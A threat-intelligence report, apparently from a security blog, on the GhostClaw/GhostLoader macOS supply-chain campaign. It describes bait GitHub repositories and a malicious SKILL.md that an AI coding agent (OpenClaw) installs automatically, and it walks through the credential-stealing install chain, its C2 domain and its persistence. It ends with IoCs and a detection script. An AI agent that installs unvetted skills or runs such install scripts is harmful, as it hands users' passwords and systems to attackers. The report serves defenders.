GhostClaw/GhostLoader Malware Deep Dive: GitHub Repo and AI Workflow Attacks on macOS
The report details how the GhostClaw/GhostLoader campaign leverages trusted GitHub repositories and AI‑assisted development workflows to deliver a multi‑stage macOS payload that steals credentials, contacts a single C2 domain, and establishes persistence, while providing blue‑team detection and mitigation guidance.
Introduction
In March 2026 Jamf Threat Labs and JFrog Security Research disclosed a macOS‑focused malware campaign codenamed GhostClaw/GhostLoader. The researchers examined at least eight newly identified GitHub repositories and uncovered additional infrastructure and infection vectors beyond the previously reported npm‑based delivery.
Initial Access via Malicious GitHub Repositories
The attackers publish repositories that masquerade as legitimate tools—trading bots, SDKs, and developer utilities—often accumulating hundreds of stars to appear trustworthy. Repositories initially contain benign or partially functional code, then later inject malicious components to gain trust before delivering payloads.
2.1 Manual Installation via README
Some repos include a README with step‑by‑step instructions that prompt users to run shell commands, typically using curl to fetch and execute a remote script. This approach relies on user interaction and trust, bypassing package‑manager safeguards.
2.2 AI‑Assisted Workflow Installation (OpenClaw)
Other repos contain a SKILL.md file targeting AI‑assisted development workflows. In frameworks like OpenClaw, an AI coding agent automatically discovers and installs external “skills” from GitHub. The SKILL.md appears benign, defining commands, dependencies, and entry points, while the malicious actions occur during the installation phase, allowing code execution without direct user interaction.
Execution Chain and Multi‑Stage Payload Delivery
3.1 Bootstrap via install.sh
The provided install command retrieves and runs install.sh, which first performs legitimate setup tasks—detecting architecture, macOS version, and Node.js presence. It uses curl -k (insecure flag) to download Node.js, disabling TLS verification. The script then invokes the next stage based on the GHOST_PASSWORD_ONLY environment variable, which controls whether a full interactive installer (value 0) or a streamlined credential‑stealing path (value 1) is used.
3.2 Credential Theft and Payload Retrieval (setup.js)
setup.js is heavily obfuscated JavaScript that, once executed, clears the terminal, shows a fake progress bar, and prompts for a password:
Password:
The entered password is verified locally with the macOS binary dscl . -authonly {username} {password}, avoiding standard authentication dialogs. The script can also display AppleScript dialogs that mimic macOS security prompts and, if needed, open the System Preferences pane to request Full Disk Access (FDA) via:
open x-apple.systempreferences:com.apple.preference.security?Privacy_AllFiles
After obtaining valid credentials, the malware contacts the C2 server at hxxps://trackpipe[.]dev, retrieves an encrypted secondary payload, decrypts it, and writes it to a temporary file such as /tmp/sys-opt-{random}.js. This secondary payload (GhostLoader) runs as a separate process, passing harvested credentials via environment variables.
3.3 Persistence and Anti‑Forensics (postinstall.js)
The secondary payload invokes postinstall.js to extend the intrusion and erase evidence. Variants either clear the terminal and perform a global npm install of the long‑standing package antigravity (creating ambiguity with a legitimate dependency) or simply display a benign success message. Persistence is achieved by writing files to user‑controlled locations such as ~/.cache/.npm_telemetry/monitor.js, mimicking legitimate npm telemetry activity.
Infrastructure and Activity Tracking
All observed variants communicate with the same C2 domain trackpipe[.]dev but embed unique UUIDs in request paths. They also set distinct NODE_CHANNEL environment variables (e.g., stablehungryavocado8, notableunfortunatecookie, starredgrumpyhay3) that the secondary payload uses for further C2 communication. Reuse of a single domain combined with per‑repo identifiers enables the campaign to segment activity across multiple bait repositories.
Conclusion
The campaign demonstrates a shift in software‑supply‑chain attacks: attackers move beyond traditional package registries to exploit trusted open‑source ecosystems and AI‑assisted development workflows. By leveraging familiar installation practices, they achieve low‑friction code execution on macOS systems.
Indicators of Compromise (IoCs)
Domain
trackpipe[.]dev
File Paths
/tmp/sys-opt-{random}.js
~/.cache/.npm_telemetry/monitor.js
Environment Variables
GHOST_PASSWORD_ONLY (0 or 1)
NODE_CHANNEL (e.g., stablehungryavocado8, notableunfortunatecookie, starredgrumpyhay3)
Legitimate Tools Used
dscl . -authonly (credential verification)
open x-apple.systempreferences:com.apple.preference.security?Privacy_AllFiles (request FDA)
Blue‑Team Defense Recommendations
7.1 Terminal Detection and Monitoring
Monitor shell commands that download and execute scripts, especially those using -k or --insecure with curl / wget.
Detect usage of dscl . -authonly, which is an uncommon credential‑validation method.
Watch for creation and execution of temporary files matching /tmp/sys-opt-*.js.
Alert on writes to non‑standard npm‑related paths such as ~/.cache/.npm_telemetry/.
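The four terminal-level checks above, expressed as matching logic over process and file-write events. This is an added example, not code from the original report or from the researchers. The event shape (cmdline, path) and the sample events are constructed, and the wget flag --no-check-certificate and the /private/tmp form of the staging path are additions beyond what the report lists.

```python
import fnmatch
import shlex

# Constructed sample events (not captured telemetry): a process command line
# plus, for file-write events, the written path. The event shape is an assumption.
SAMPLE_EVENTS = [
    {"cmdline": "curl -fsSLk https://downloads.example.invalid/node.tar.gz -o /tmp/node.tar.gz"},
    {"cmdline": "dscl . -authonly alice REDACTED"},
    {"cmdline": "node /tmp/sys-opt-8f3a1c.js"},
    {"cmdline": "node setup.js", "path": "/Users/alice/.cache/.npm_telemetry/monitor.js"},
    {"cmdline": "curl -fsSL https://nodejs.org/dist/index.json"},  # benign
    {"cmdline": "npm install -g typescript", "path": "/Users/alice/.npm/_logs/debug.log"},  # benign
]

STAGE_GLOBS = ("/tmp/sys-opt-*.js", "/private/tmp/sys-opt-*.js")  # /tmp -> /private/tmp on macOS


def match_rules(event):
    """Return the sorted names of the section 7.1 checks that one event triggers."""
    cmdline = event.get("cmdline", "")
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in logged text
        argv = cmdline.split()
    tools = {tok.rsplit("/", 1)[-1] for tok in argv}  # basenames, so /usr/bin/curl counts
    paths = argv + [event.get("path", "")]
    hits = set()

    # curl short flags can be clustered (-fsSLk), so look for "k" inside the cluster.
    short_k = any(t.startswith("-") and not t.startswith("--") and "k" in t for t in argv)
    if ("curl" in tools and (short_k or "--insecure" in argv)) or (
        "wget" in tools and "--no-check-certificate" in argv  # wget's equivalent flag
    ):
        hits.add("insecure_fetch")
    if "dscl" in tools and "-authonly" in argv:
        hits.add("dscl_authonly")
    if any(fnmatch.fnmatchcase(p, g) for p in paths for g in STAGE_GLOBS):
        hits.add("tmp_stage_js")
    if any("/.cache/.npm_telemetry/" in p for p in paths):
        hits.add("npm_telemetry_write")
    return sorted(hits)


def scan(events):
    """Return (cmdline, rule names) for every event that triggers at least one check."""
    results = [(e.get("cmdline", ""), match_rules(e)) for e in events]
    return [r for r in results if r[1]]


if __name__ == "__main__":
    for cmdline, rules in scan(SAMPLE_EVENTS):
        print(f"{', '.join(rules):22} {cmdline}")
```

The short-flag check will also fire on a curl option cluster where "k" is an argument rather than a flag, so treat insecure_fetch hits as triage leads rather than verdicts.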
7.2 Behavioral Analytics and UEBA
Enforce code‑review policies for AI‑assisted development tools like OpenClaw.
Detect network connections to the known malicious domain trackpipe[.]dev.
Flag anomalous environment variable settings for GHOST_PASSWORD_ONLY and NODE_CHANNEL.
7.3 User Security Awareness Training
Educate users to avoid executing curl | bash pipelines without verification.
Encourage verification of GitHub repository history, star counts, and code reviews before running installation scripts.
Highlight the risks of installing AI‑generated “skills” without additional security checks.
7.4 Supply‑Chain Protection
Implement internal proxy repositories and scan all external dependencies for malicious content.
Apply the principle of least privilege in development environments to prevent automatic granting of Full Disk Access.
Enforce code‑signing policies to block execution of unsigned scripts.
7.5 Containment and Response
Isolate infected systems immediately and conduct forensic analysis.
Force password resets for any credentials that may have been captured.
Deploy Endpoint Detection and Response (EDR) solutions for real‑time threat detection.
Summary
GhostClaw/GhostLoader represents a new trend in software‑supply‑chain attacks, targeting AI‑assisted development workflows and trusted open‑source repositories to deliver a highly obfuscated, multi‑stage macOS payload that steals credentials and establishes persistence. Blue teams must incorporate AI‑enabled tooling into their threat models, create detection rules for the described behaviors, and continuously monitor related threat intelligence.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
